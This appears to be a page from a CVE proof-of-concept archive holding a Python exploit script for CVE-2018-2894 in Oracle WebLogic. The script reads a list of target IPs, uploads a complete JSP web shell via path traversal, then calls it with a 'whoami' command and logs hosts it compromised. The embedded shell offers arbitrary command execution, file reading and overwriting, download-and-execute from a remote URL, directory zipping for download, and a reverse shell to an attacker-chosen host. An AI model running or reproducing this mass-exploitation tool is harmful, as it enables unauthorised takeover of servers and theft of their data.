4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-2894
README.md
Rendering markdown...
POC / cve-2018-2894.py PY
⬇ Raw GitHub ✕ Close 
#coding=utf-8
#Author By ddea
import requests

rs = open ("weblogic_ip1.txt","r")#被检测ip的文件
b = open ("havebigin3.txt","a+")#存在漏洞的输出文件
b.write("asdfasdf")
for line in rs.readlines():
	session = requests.Session()
	timeout = 40
	site = line.strip()
	url = site + "ws_utc/resources/ws/config/import"
	url2 = site + "console/framework/skins/wlsconsole/images/_cat.jsp"
	print (url)
	payload4 = {"action":"exec","cmd":"whoami"}
	paramsGet = {"timestamp":"1522216072056"}
	paramsMultipart = [('../../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/', ('cat.jsp', "<%@page import=\"java.util.zip.ZipEntry\"%>\n<%@page import=\"java.util.zip.ZipOutputStream\"%>\n<%@ page language=\"java\" pageEncoding=\"UTF-8\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.text.SimpleDateFormat\"%>\n<%@ page import=\"java.io.*\" %>\n<%@ page import=\"java.net.*\" %>\n<%!\n\x09static String encoding = \"UTF-8\";\n\x09\n\x09static{\n\x09\x09encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;\n\x09}\n\x09\n\x09/**\n\x09 * \xe5\xbc\x82\xe5\xb8\xb8\xe8\xbd\xac\xe6\x8d\xa2\xe6\x88\x90\xe5\xad\x97\xe7\xac\xa6\xe4\xb8\xb2\xef\xbc\x8c\xe8\x8e\xb7\xe5\x8f\x96\xe8\xaf\xa6\xe7\xbb\x86\xe5\xbc\x82\xe5\xb8\xb8\xe4\xbf\xa1\xe6\x81\xaf\n\x09 * @param e\n\x09 * @return\n\x09 */\n\x09static String exceptionToString(Exception e) {\n\x09    StringWriter sw = new StringWriter();\n\x09    e.printStackTrace(new PrintWriter(sw, true));\n\x09    return sw.toString();\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\x8e\xb7\xe5\x8f\x96\xe7\xb3\xbb\xe7\xbb\x9f\xe6\x96\x87\xe4\xbb\xb6\xe7\xbc\x96\xe7\xa0\x81\n\x09 * @return\n\x09 */\n\x09static String getSystemEncoding(){\n\x09\x09return System.getProperty(\"sun.jnu.encoding\");\n\x09}\n\x09\n\x09/**\n\x09 * \xe9\x9d\x9e\xe7\xa9\xba\xe5\x88\xa4\xe6\x96\xad\n\x09 *\n\x09 * @param obj\n\x09 * @return\n\x09 */\n\x09static boolean isNotEmpty(Object obj) {\n\x09    if (obj == null) {\n\x09        return false;\n\x09    }\n\x09    return !\"\".equals(String.valueOf(obj).trim());\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\xbe\x93\xe5\x85\xa5\xe6\xb5\x81\xe8\xbd\xac\xe4\xba\x8c\xe8\xbf\x9b\xe5\x88\xb6\xe6\x95\xb0\xe7\xbb\x84\xe8\xbe\x93\xe5\x87\xba\xe6\xb5\x81\n\x09 * @param in\n\x09 * @return\n\x09 * @throws IOException\n\x09 */\n\x09static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{\n\x09\x09ByteArrayOutputStream baos = new ByteArrayOutputStream();\n\x09\x09byte[] b = new byte[1024];\n\x09    int a = 0;\n\x09    while((a = in.read(b))!=-1){\n\x09    \x09baos.write(b,0,a);\n\x09\x09}\n\x09\x09return baos;\n\x09}\n\x09\n\x09/**\n\x09 * \xe5\xa4\x8d\xe5\x88\xb6\xe6\xb5\x81\xe5\x88\xb0\xe6\x96\x87\xe4\xbb\xb6\xef\xbc\x8c\xe5\xa6\x82\xe6\x9e\x9c\xe6\x96\x87\xe4\xbb\xb6\xe5\xad\x98\xe5\x9c\xa8\xe9\xbb\x98\xe8\xae\xa4\xe4\xbc\x9a\xe8\xa6\x86\xe7\x9b\x96\n\x09 * @param in\n\x09 * @param path\n\x09 * @throws IOException\n\x09 */\n\x09static void copyInputStreamToFile(InputStream in,String path) throws IOException{\n\x09\x09FileOutputStream fos = new FileOutputStream(path);\n\x09\x09fos.write(inutStreamToOutputStream(in).toByteArray());\n\x09\x09fos.flush();\n\x09\x09fos.close();\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\xa8\xa1\xe4\xbb\xbfLinux\xe4\xb8\x8b\xe7\x9a\x84cat Windows\xe4\xb8\x8b\xe7\x9a\x84type \xe6\x9f\xa5\xe7\x9c\x8b\xe6\x96\x87\xe4\xbb\xb6\xe5\x86\x85\xe5\xae\xb9 \n\x09 * @param path\n\x09 * @return\n\x09 * @throws IOException\n\x09 */\n\x09static String cat(String path) throws IOException {\n\x09\x09return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\x89\xa7\xe8\xa1\x8c\xe6\x93\x8d\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe5\x91\xbd\xe4\xbb\xa4 \xe5\xa6\x82\xe6\x9e\x9c\xe6\x98\xafwindows\xe6\x9f\x90\xe4\xba\x9b\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe4\xb8\x8d\xe4\xba\x86\xef\xbc\x8c\xe5\x8f\xaf\xe4\xbb\xa5\xe7\x94\xa8 cmd /c dir \xe6\x89\xa7\xe8\xa1\x8cdir\xe5\x91\xbd\xe4\xbb\xa4\n\x09 * @param cmd\n\x09 * @return\n\x09 */\n\x09static String exec(String cmd) {\n\x09\x09try {\n\x09\x09\x09return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);\n\x09\x09} catch (IOException e) {\n\x09\x09\x09return exceptionToString(e);\n\x09\x09}\n\x09}\n\x09\n\x09/**\n\x09 * \xe4\xb8\x8b\xe8\xbd\xbd\xe6\x96\x87\xe4\xbb\xb6\xe5\x88\xb0\xe6\x8c\x87\xe5\xae\x9a\xe7\x9b\xae\xe5\xbd\x95,\xe4\xbf\x9d\xe5\xad\x98\xe7\x9a\x84\xe6\x96\x87\xe4\xbb\xb6\xe5\x90\x8d\xe5\xbf\x85\xe9\xa1\xbb\xe6\x8c\x87\xe5\xae\x9a\n\x09 * @param url\n\x09 * @param path\n\x09 * @throws MalformedURLException\n\x09 * @throws IOException\n\x09 */\n\x09static void download(String url,String path) throws MalformedURLException, IOException{\n\x09\x09copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);\n\x09}\n\x09\n\x09/**\n\x09 * \xe8\xbf\x9e\xe6\x8e\xa5\xe8\xbf\x9c\xe7\xa8\x8b\xe7\xab\xaf\xe5\x8f\xa3\xef\xbc\x8c\xe6\x8f\x90\xe4\xbe\x9b\xe6\x9c\xac\xe5\x9c\xb0\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe5\x85\xa5\xe5\x8f\xa3\n\x09 * @param host\n\x09 * @param port\n\x09 * @throws UnknownHostException\n\x09 * @throws IOException\n\x09 */\n\x09static void shell(String host,int port) throws UnknownHostException, IOException{\n\x09\x09Socket s = new Socket(host,port);\n\x09\x09OutputStream out = s.getOutputStream();\n\x09\x09InputStream in = s.getInputStream();\n\x09\x09out.write((\"User:\\t\"+exec(\"whoami\")).getBytes());\n\x09\x09int a = 0;\n\x09\x09byte[] b = new byte[1024];\n\x09\x09while((a=in.read(b))!=-1){\n\x09\x09\x09out.write(exec(new String(b,0,a,\"UTF-8\").trim()).getBytes(\"UTF-8\"));\n\x09\x09}\n\x09}\n\x09\n\x09/**\n\x09 * \xe4\xb8\x8b\xe8\xbd\xbd\xe8\xbf\x9c\xe7\xa8\x8b\xe6\x96\x87\xe4\xbb\xb6\xe5\xb9\xb6\xe6\x89\xa7\xe8\xa1\x8c\xef\xbc\x8c\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c\xe5\xae\x8c\xe6\x88\x90\xe5\x90\x8e\xe4\xbc\x9a\xe5\x88\xa0\xe9\x99\xa4\xe4\xb8\x8b\xe8\xbd\xbd\xe7\x9a\x84\xe6\x96\x87\xe4\xbb\xb6\n\x09 * @param url\n\x09 * @param fileName\n\x09 * @param cmd\n\x09 * @return\n\x09 * @throws MalformedURLException\n\x09 * @throws IOException\n\x09 */\n\x09static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{\n\x09\x09download(url, fileName);\n\x09\x09String out = exec(cmd);\n\x09\x09new File(fileName).delete();\n\x09\x09return out;\n\x09}\n\x09\n\x09static void saveFile(String file,String data) throws IOException{\n\x09\x09copyInputStreamToFile(new ByteArrayInputStream(data.getBytes()), file);\n\x09}\n\x09\n\x09/**\n\x09 * \xe6\x96\x87\xe4\xbb\xb6\xe5\x8e\x8b\xe7\xbc\xa9\n\x09 * @throws IOException\n\x09 */\n\x09static void zipFile(ZipOutputStream zos,File file) throws IOException{\n\x09\x09if(file.isDirectory() && file.canRead()){\n\x09\x09\x09File[] files = file.listFiles();\n\x09\x09\x09for(File f:files){\n\x09\x09\x09\x09zipFile(zos, f);\n\x09\x09\x09}\n\x09\x09}else{\n\x09\x09\x09ZipEntry z = new ZipEntry(file.getName());\n            zos.putNextEntry(z);\n            zos.write(inutStreamToOutputStream(new FileInputStream(file)).toByteArray());\n            zos.closeEntry();\n\x09\x09}\n\x09}\n\x09\n\x09static void zip(ByteArrayOutputStream out,File file) throws IOException{\n\x09\x09ZipOutputStream zos = new ZipOutputStream(out);\n\x09\x09zipFile(zos,file);\n\x09}\n\x09\n%>\n<html>\n<head>\n<title><%=application.getServerInfo() %></title>\n<meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\n<STYLE>\n\x09H1 {color: white;background-color: \x23525D76;font-size: 22px;}\n\x09H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:\x23525D76;font-size:14px;}\n\x09BODY {font-family: Tahoma, Arial, sans-serif;font-size:12px;color: black;background-color: white;}\n\x09A {color: black;}\n\x09HR {color: \x23525D76;}\n</STYLE>\n<script> \nfunction get(p){\n     document.getElementById('p').value = p;\n     document.getElementById('action').value = \"get\";\n     document.getElementById('fm').submit();\n}\nfunction saveFile(){\n     document.getElementById('action').value = \"saveFile\";\n     document.getElementById('fm').submit();\n}\n</script>\n</head>\n<body>\n<%\n\x09try{\n\x09\x09String action = request.getParameter(\"action\");\n\x09\x09String path = isNotEmpty(request.getParameter(\"p\"))?request.getParameter(\"p\"):new File((isNotEmpty(application.getRealPath(\"/\"))?application.getRealPath(\"/\"):\".\")).getCanonicalPath();\n\x09\x09out.println(\"<form action=\\\"\\\" method=\\\"post\\\" id=\\\"fm\\\">\");\n\x09\x09if(isNotEmpty(action) && !\"get\".equalsIgnoreCase(action)){\n\x09\x09\x09if(\"shell\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09shell(request.getParameter(\"host\"), Integer.parseInt(request.getParameter(\"port\")));\n\x09\x09\x09}else if(\"downloadL\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09download(request.getParameter(\"url\"), request.getParameter(\"path\"));\n\x09\x09\x09\x09out.println(\"\xe6\x96\x87\xe4\xbb\xb6\xe4\xb8\x8b\xe8\xbd\xbd\xe6\x88\x90\xe5\x8a\x9f.\");\n\x09\x09\x09}else if(\"exec\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>\xe5\x91\xbd\xe4\xbb\xa4\xe6\x89\xa7\xe8\xa1\x8c:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+exec(request.getParameter(\"cmd\"))+\"</pre>\");\n\x09\x09\x09}else if(\"cat\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>\xe6\x96\x87\xe4\xbb\xb6\xe6\x9f\xa5\xe7\x9c\x8b:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+cat(request.getParameter(\"path\"))+\"</pre>\");\n\x09\x09\x09}else if(\"auto\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09out.println(\"<h1>Auto:</h1>\");\n\x09\x09\x09\x09out.println(\"<pre>\"+auto(request.getParameter(\"url\"),request.getParameter(\"fileName\"),request.getParameter(\"cmd\"))+\"</pre>\");\n\x09\x09\x09}else if(\"download\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09response.setContentType(\"application/x-download\");\n\x09\x09\x09\x09File file = new File(path,request.getParameter(\"fileName\"));\n\x09\x09\x09\x09String fileName = file.isDirectory() ? file.getName()+\".zip\":file.getName();\n\x09\x09\x09\x09response.setHeader(\"Content-Disposition\", \"attachment; filename=\"+fileName);\n\x09\x09\x09\x09BufferedOutputStream bos = new BufferedOutputStream(response.getOutputStream());\n\x09\x09\x09\x09if(file.isDirectory()){\n\x09\x09\x09\x09\x09ByteArrayOutputStream baos = new ByteArrayOutputStream();\n\x09\x09\x09\x09\x09zip(baos, file);\n\x09\x09\x09\x09\x09bos.write(baos.toByteArray());\n\x09\x09\x09\x09\x09baos.close();\n\x09\x09\x09\x09}else{\n\x09\x09\x09\x09\x09InputStream in = new FileInputStream(file);\n\x09\x09\x09\x09\x09int len;\n\x09\x09\x09\x09\x09byte[] buf = new byte[1024];\n\x09\x09\x09\x09\x09while ((len = in.read(buf)) > 0) {\n\x09\x09\x09\x09\x09\x09bos.write(buf, 0, len);\n\x09\x09\x09\x09\x09}\n\x09\x09\x09\x09\x09in.close();\n\x09\x09\x09\x09}\n\x09\x09\x09\x09bos.close();\n\x09\x09\x09\x09out.clear();\n\x09\x09\x09\x09out = pageContext.pushBody();\n\x09\x09\x09\x09return ;\n\x09\x09\x09}else if(\"saveFile\".equalsIgnoreCase(action)){\n\x09\x09\x09\x09String file = request.getParameter(\"file\");\n\x09\x09\x09\x09String data = request.getParameter(\"data\");\n\x09\x09\x09\x09if(isNotEmpty(file) && isNotEmpty(data)){\n\x09\x09\x09\x09\x09saveFile(new String(file.getBytes(\"ISO-8859-1\"),\"utf-8\"),new String(data.getBytes(\"ISO-8859-1\"),\"utf-8\"));\n\x09\x09\x09\x09\x09out.println(\"<script>history.back(-1);alert('ok');</script>\");\n\x09\x09\x09\x09}\n\x09\x09\x09}\n\x09\x09}else{\n\x09\x09\x09File file = new File(path);\n\x09\x09\x09if(file.isDirectory()){\n%>\n<h1>Directory Listing For <%=path%></h1>\n<HR size=\"1\" noshade=\"noshade\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"5\" align=\"center\">\n<tr>\n<td align=\"left\"><font size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe5\x90\x8d</strong></font></td>\n<td align=\"center\"><font size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe5\xa4\xa7\xe5\xb0\x8f</strong></font></td>\n<td align=\"center\"><font size=\"+1\"><strong>\xe6\x96\x87\xe4\xbb\xb6\xe4\xb8\x8b\xe8\xbd\xbd</strong></font></td>\n<td align=\"right\"><font size=\"+1\"><strong>\xe6\x9c\x80\xe5\x90\x8e\xe4\xbf\xae\xe6\x94\xb9\xe6\x97\xb6\xe9\x97\xb4</strong></font></td>\n</tr>\n<%\x09\x09\x09\x09\x09\n\x09\x09\x09\x09List<File> ls = new ArrayList<File>();\n\x09\x09\x09\x09ls.add(new File(file,\"..\"));\n\x09\x09\x09\x09ls.addAll(Arrays.asList(file.listFiles()));\n\x09\x09\x09\x09for(int i = 0; i < ls.size(); i++){\n\x09\x09\x09\x09\x09File f = ls.get(i);\n\x09\x09\x09\x09\x09String fileCanonicalPath = f.getCanonicalPath().replaceAll(\"\\\\\\\\\",\"/\");\n\x09\x09\x09\x09\x09out.println(\"<tr \"+((i%2!=0)?\"bgcolor=\\\"\x23eeeeee\\\"\":\"\")+\"><td align=\\\"left\\\">&nbsp;&nbsp;<a href=\\\"javascript:get('\"+(f.getCanonicalPath().replaceAll(\"\\\\\\\\\",\"/\"))+\"');\\\"><tt>\"+f.getName()+\"</tt></a></td><td align=\\\"center\\\"><tt>\"+(f.length()/1000)+\"KB</tt></td><td align=\\\"center\\\"><a href=\\\"\"+request.getContextPath()+request.getServletPath()+\"?action=download&p=\"+path+\"&fileName=\"+f.getName()+\"\\\"><tt>\xe4\xb8\x8b\xe8\xbd\xbd</tt></a></td><td align=\\\"right\\\"><tt>\"+new SimpleDateFormat(\"yyyy-MM-dd hh:mm:ss\").format(new Date(f.lastModified())) +\"</tt></td></tr>\");\n\x09\x09\x09\x09}\n\x09\x09\x09}else{\n\x09\x09\x09\x09out.println(\"<h1>\xe6\x96\x87\xe4\xbb\xb6\xe7\xbc\x96\xe8\xbe\x91:</h1>\");\n\x09\x09\x09\x09out.println(\"File:<input type=\\\"text\\\" style=\\\"width:600px;\\\" name=\\\"file\\\" value=\\\"\"+path+\"\\\" /><input type=\\\"button\\\" style=\\\"margin-left:20px;\\\" value=\\\"\xe4\xbf\x9d\xe5\xad\x98\\\" onclick=\\\"saveFile()\\\" /><span id=\\\"result\\\"></span><br/><br/>\");\n\x09\x09\x09\x09out.println(\"<textarea style=\\\"width:100%;height:500px;\\\" name=\\\"data\\\">\"+cat(path)+\"</textarea>\");\n\x09\x09\x09}\n\x09\x09}\n\x09\x09out.println(\"<input type=\\\"hidden\\\" name=\\\"p\\\" id=\\\"p\\\" value=\\\"\"+path+\"\\\"/><input type=\\\"hidden\\\" name=\\\"action\\\" id=\\\"action\\\" value=\\\"get\\\" /></form></table>\");\n\x09\x09out.println(\"<HR size=\\\"1\\\" noshade=\\\"noshade\\\"><h3>\"+application.getServerInfo()+\"</h3></body></html>\");\n\x09}catch(Exception e){\n\x09\x09out.println(\"<pre>\"+exceptionToString(e)+\"</pre>\");\n\x09}\n%>\n", 'application/octet-stream'))]
	#上传的文件,可以换成txt
	headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0","Referer":"http://200.120.137.180:7001/ws_utc/begin.do","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
	cookies = {"JSESSIONID":"l45rHIDksK5T6YxryhUxlbSUu8NIa0v-MAlPINuyBsv1vdnyD1Ft!-306100299"}
	errorwhile = "Error while importing test"
	while True:
		try:
			response = session.post(url, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies,verify=False,timeout=20)
		#with区块退出后会话能被关闭即使发生了异常也一样
			#print("Status code:   %i" % response.status_code)
			#print("Response body: %s" % response.content)
			#print (response.content.index(errorwhile)) #如果返回的内容中包含errorwhile的值 
			if (response.content.find(errorwhile)) > 0:
				print (site,"have Vulnerability")
				b.writelines(url)
				b.writelines("\n")
				b.flush()
				try:
					resurl4 = session.get(url2,params=payload4,headers=headers,verify=False,timeout=20)
					print("Status code:   %i" % resurl4.status_code)
					print("Response body: %s" % resurl4.content)
					#resurl5 = session.get(url2,params=payload5,headers=headers,verify=False,timeout=20)
					#print ("resurl5:",resurl5.content)
					print("=================================================================================================================================================")
					session.close
					break
				except:
					break
			elif (response.content.find("Deploying Application")) > 0:
				print ("Dep error")
				continue
			else:
				break
		except:
			session.close
			break
	else:
		break